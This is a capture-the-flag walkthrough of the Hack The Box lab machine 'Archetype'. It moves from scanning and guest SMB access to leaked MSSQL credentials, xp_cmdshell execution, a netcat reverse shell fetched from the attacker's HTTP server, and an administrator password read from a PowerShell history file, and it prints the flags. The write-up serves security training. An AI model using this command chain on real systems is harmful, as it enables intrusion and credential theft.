Archetype
Reconnaissance
IP: 10.129.44.22
Starting with the default Nmap scan we see four services running.
nmap -sC -sV -Pn 10.129.44.22
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Full Nmap Output
For the full output see here: Archetype - Nmap Scan
The first service is part of Microsofts implementation of RPC, MSRPC running on port 135. This service specifically is the RPC Port Mapper. It is used to bind to the server remotely and enumerate all the other running RPC services running and their ports. Nmap has already done that for us. On ports 139 and 445 we can see SMB running (see the note to understand why two ports are used).
Last but not least we can see a MSSQL server running on port 1433.
Gaining Access
From the nmap scan we can see that we can access the SMB server as a guest. Lets try to see which shares are available. We will use SMBClient for that.
smbclient -U 'guest' -L 10.129.44.22
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
The only share we are able to access with this account is backups. Lets see whats inside.
smbclient -U 'guest' \\\\10.129.44.22\\backups
smb: \> dir
. D 0 Mon Jan 20 07:20:57 2020
.. D 0 Mon Jan 20 07:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 07:23:02 2020
smb: \> get prod.dtsConfig
We find a file called prod.dtsConfig. In there are credentials for the MSSQL service. Here the important line.
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
After looking at the MSSQL page on Hacktricks I connected with MSSQLClient.py from Impacket and enable code execution.
impacket-mssqlclient -windows-auth ARCHETYPE/sql_svc:M3g4c0rp123@10.129.44.22
SQL>enable_xp_cmdshell
SQL>xp_cmdshell whoami
archetype\sql_svc
Now all thats left is to escalate to Administrator and find the flag. For comfortability lets get a Reverse Shell. First start a simple HTTP Server with Python on port 80 with the reverse shell inside. I used locate to search for nc.exe but it’s also available online. Not sure if it’s the right version since it doesn’t say x64 but it works so it’s fine.
ls
nc.exe
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Then downlaod it to the MSSQL server I decided to do it with Wget in Powershell. I found lots of usefult command on this Hacktricks site.
SQL> EXEC xp_cmdshell 'echo wget "http://10.10.16.10/nc.exe" -outfile "C:\Users\sql_svc\nc.exe" | powershell -noprofile'
EXEC xp_cmdshell is better than just xp_cmdshell
Not sure why but just xp_cmdshell can execute some commands and some not. Especially commands that have a path inside. Just use the EXEC option and don’t forget to add
''to each side of the command
Now all that is left is to set up a Netcat listener and connect to it. Listener:
nc -lnvp 4444
Launch the shell:
SQL> EXEC xp_cmdshell 'C:\Users\sql_svc\nc.exe 10.10.16.10 4444 -e cmd.exe'
Don't forget -e cmd.exe
This will connect you directly to
cmd.exeif you don’t use that option you will just get a plain data stream not a reverse shell
And we get an output! Lets also get the user flag.
c -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.16.10] from (UNKNOWN) [10.129.44.22] 49674
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
archetype\sql_svc
C:\Windows\system32>type C:\Users\sql_svc\Desktop\user.txt
3e7b102e7***********************
User Flag
3e7b102e78218e935bf3f4951fec21a3
Why not a more versatile reverse shell?
I’m not very proficient with reverse shells so after a bit of research I just used the most simple Netcat shell I can find. The Powershell Oneliners on Hacktricks needed a powershell script with a reverse shell which I didn’t have and the ones I found I couldn’t get to run. So I simply downloaded the Netcat executable on the server and ran it.
Escalate Privileges
Now lets upload and run WinPEAS to try and escalate privileges. I found it in the Release page on GitHub. I switched to Powershell for easier download
C:\Windows\system32>powershell
PS C:\Windows\system32> wget "http://10.10.16.10/winPEASx64.exe" -OutFile C:\Users\sql_svc\winPEASx64.exe
PS C:\Windows\system32> C:\Users\sql_svc\winPEASx64.exe
Full WinPEAS Output
For the full output see here: Archetype - WinPEAS Output
The full output is very long but luckily the most important parts are marked red. After examining those I found out that the account we have (sql_svc) has the SeImpersonatePrivilege token enabled. Which means we can impersonate the Administrator and run commands with his privileges. I spent a ton of time researching this only to find out that it doesn’t work on Windows Server 2019 which is running on the VM. I was cluelesst and checked the Solution and found out that there is a history file which has the password. To be fair WinPEAS found it and marked it red but I thought it was not worth checking out. My mistake. Lets open this file now.
PS C:\Windows\system32> cat C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
The password seems to be MEGACORP_4dm1n!!. Now lets login into the SMB shares we couldn’t access before and get the flag.
smbclient -U 'Administrator' \\\\10.129.44.22\\C$
smb: \>get Users\Administrator\Desktop\root.txt
And we are done!
Flag
b91ccec3305e98240082d4474b848528